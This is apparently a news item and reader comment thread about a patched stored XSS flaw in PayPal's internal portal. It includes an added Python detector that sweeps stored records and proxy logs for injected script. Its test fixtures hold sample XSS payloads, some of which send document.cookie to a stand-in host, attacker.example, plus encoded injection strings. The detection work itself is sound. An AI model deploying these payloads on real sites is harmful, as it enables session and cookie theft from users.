XSS marks the spot: PayPal portal peril plugged

PayPal has plugged a potentially nasty flaw on its internal portal. The vulnerability, discovered by security analyst Benjamin Kunz Mejri of Vulnerability Laboratory, involved security shortcomings in PayPal's backend systems. More specifically, he said, it was an application-side filter bypass vulnerability in the official …

  1. Crazy Operations Guy

    "There's no evidence that any of these attacks actually occurred."

    Just because there is no evidence doesn't mean something didn't happen. The vulnerability allows running scripts on the back-end system; it wouldn't be too much of a stretch to think that might include the ability to interact with the logging system or run a basic line editor to delete the specific log entries.

    1. Notas Badoff

      Re: "There's no evidence that any of these attacks actually occurred."

      "The persistent input validation vulnerability allows remote attackers to inject own malicious script codes on the application-side of the vulnerable service."

      Um, so we ought to be hearing that they have thoroughly scrubbed all the data that could have had scripts inserted, right? But we didn't?

      In fact, when we've heard about attacks allowing persistent storage of evil scripts, when did we ever hear that the 'fix' included checking that nothing evil remains stored?

    2. fearnothing

      Re: "There's no evidence that any of these attacks actually occurred."

      Remember that places of this size will have IDS/IPS, reverse proxy and web app firewall logs which would most likely detect such activity. The logs that theoretical attackers may have had access to would not have been the only means of verifying an attack.
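The two points raised above, that a fix for stored XSS should be followed by a sweep of the stored data for payloads that are already in it, and that a reverse proxy or WAF in front of the application keeps its own record of the requests that planted them, can both be checked with the same detector. The following is an added example, not code from The Register, Vulnerability Laboratory or PayPal, and it knows nothing about PayPal's actual portal. The record store, the ticket IDs, the `attacker.example` host and the combined-format proxy log lines are all constructed for this example; the detector is a small HTML-parser-based check for script tags, inline event handlers and `javascript:` URLs rather than a complete XSS oracle.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote_plus

# Constructed sample of stored user-supplied content, keyed by a hypothetical ticket id.
# ticket-1003 is correctly entity-encoded and must NOT be flagged: it renders as text.
STORED_RECORDS = {
    "ticket-1001": "Please refund order #4412, thanks",
    "ticket-1002": '<img src="x" onerror="fetch(\'//attacker.example/?c=\'+document.cookie)">',
    "ticket-1003": "Escaped text: &lt;script&gt;alert(1)&lt;/script&gt;",
    "ticket-1004": '<a href="&#106;avascript:alert(document.domain)">click</a>',
    "ticket-1005": "<SCRIPT>document.location='//attacker.example/?'+document.cookie</SCRIPT>",
}

# Constructed reverse-proxy access log (combined format). Line 4 is double percent-encoded,
# a common trick to get past a filter that decodes only once.
PROXY_LOG = """\
203.0.113.7 - - [10/Jan/2015:12:00:01 +0000] "GET /portal/tickets?id=1001 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Jan/2015:12:00:09 +0000] "GET /portal/tickets/new?subject=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.cookie%29%3E HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.23 - - [10/Jan/2015:12:01:15 +0000] "GET /portal/search?q=refund+status HTTP/1.1" 200 3301 "-" "Mozilla/5.0"
198.51.100.23 - - [10/Jan/2015:12:02:40 +0000] "GET /portal/search?q=%253Cscript%253Ealert%281%29%253C%2Fscript%253E HTTP/1.1" 200 3301 "-" "Mozilla/5.0"
"""


class XSSFinder(HTMLParser):
    """Flags markup that executes script when rendered as HTML.

    Using a real parser (instead of regex over the raw string) means entity-encoded
    attribute values such as &#106;avascript: are decoded the way a browser would,
    while text that is merely *escaped* markup (&lt;script&gt;) never becomes a tag."""

    DANGEROUS_TAGS = {"script", "iframe", "object", "embed", "svg", "base", "meta", "link"}
    URL_ATTRS = {"href", "src", "action", "formaction", "data", "xlink:href"}

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag in self.DANGEROUS_TAGS:
            self.findings.append(f"tag:{tag}")
        for name, value in attrs:
            if name.startswith("on"):                       # onerror=, onload=, onmouseover=, ...
                self.findings.append(f"event:{name}")
            elif name in self.URL_ATTRS and value:
                # Strip whitespace first: "java\tscript:" is accepted by browsers.
                if re.sub(r"\s", "", value).lower().startswith("javascript:"):
                    self.findings.append(f"js-url:{name}")


def find_xss(value: str) -> list:
    """Return a list of findings for one piece of content (empty list means nothing found)."""
    finder = XSSFinder()
    finder.feed(value)
    finder.close()
    return finder.findings


def scan_records(records: dict) -> dict:
    """Sweep stored content after a stored-XSS fix: returns {record_id: findings} for hits only."""
    return {rid: hits for rid, text in records.items() if (hits := find_xss(text))}


LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def url_decode_fully(s: str, max_rounds: int = 3) -> str:
    """Percent-decode repeatedly (bounded) so double-encoded payloads are seen as the app sees them."""
    for _ in range(max_rounds):
        decoded = unquote_plus(s)
        if decoded == s:
            break
        s = decoded
    return s


def scan_proxy_log(log_text: str) -> list:
    """Run the same detector over the request targets in a proxy access log.

    Returns (client_ip, timestamp, raw_target, findings) for each suspicious request, which is
    the kind of independent trace that survives even if an attacker edits the application's own logs."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = find_xss(url_decode_fully(m["target"]))
        if findings:
            hits.append((m["ip"], m["ts"], m["target"], findings))
    return hits


if __name__ == "__main__":
    for rid, hits in scan_records(STORED_RECORDS).items():
        print(f"stored payload in {rid}: {hits}")
    for ip, ts, target, hits in scan_proxy_log(PROXY_LOG):
        print(f"{ts} {ip} {hits} {target}")
```

Running the script reports ticket-1002, ticket-1004 and ticket-1005 as stored payloads (ticket-1003 is skipped because its markup is entity-encoded text, not tags) and attributes the two injection attempts in the proxy log to their source addresses and timestamps, including the double-encoded one. Note that an access log only carries the query string; a POST body that planted a payload would only show up in a WAF or request-body log, which is why the reverse proxy, WAF and IDS records fearnothing mentions are worth correlating rather than relying on any one of them.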

  2. btrower

    I am stunned to hear about another security issue

    Not.
